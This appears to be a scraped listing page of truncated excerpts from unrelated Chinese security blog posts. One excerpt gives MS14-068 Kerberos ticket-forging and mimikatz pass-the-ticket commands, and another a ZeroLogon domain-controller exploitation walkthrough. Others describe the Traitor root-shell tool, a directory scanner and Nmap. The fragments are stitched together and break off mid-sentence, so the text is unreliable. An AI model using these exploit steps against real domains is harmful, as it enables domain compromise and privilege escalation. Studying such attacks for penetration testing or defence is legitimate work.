MS14-068第一步:利用MS14-068伪造生成TGTMS14-068.exe -u test@coleak.com -p 123456 -s S-1-5-21-2801122135-3886333168- 273474972-1103 -d dc.coleak.com第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书mimikatz kerberos::ptc TGT
CVE-2020-1472-ZeroLogon复现检测是否存在 zerologin python3 zerologon_tester.py ad01 192.168.145.134Performing authentication attempts...Success! DC can be fully compromised by a Zerologon attack.置空DC的密码python3
项目在github已开源,获取地址:https://github.com/coleak2021/dirpro1.简介dirpro 是一款由 python 编写的目录扫描器,操作简单,功能强大,高度自动化自动根据返回状态码和返回长度,对扫描结果进行二次整理和判断,准确性非常高已实现功能可自定义扫描线程每扫描10%自动显示扫描进度可自定义扫描字典文件可自定义代理流量自动使用随机的User-Agent自
Traitor 打包了一系列方法来利用本地错误配置和漏洞来弹出 root shell:几乎所有GTFOBins可写 docker.sockCVE-2022-0847(脏管道)CVE-2021-4034(pwnkit)CVE-2021-3560它将利用 GTFOBins 中列出的大多数 sudo 权限来弹出 root shell,以及利用可写docker.sock或最近的脏管道 (CVE-2022-
1 Nmap Nmap:Network Mapper,“网络映射器”。Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务(应用程序名称和版本),它们正在运行的操作系统和版本,包过滤器/防火墙的类型。它旨在快速扫描大型网络,但可以在单个主机上正常运行。 2 基本功能 1. 主机发现:探测一组主机是否在线。默认情况下,Nmap通过4种方式——
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号
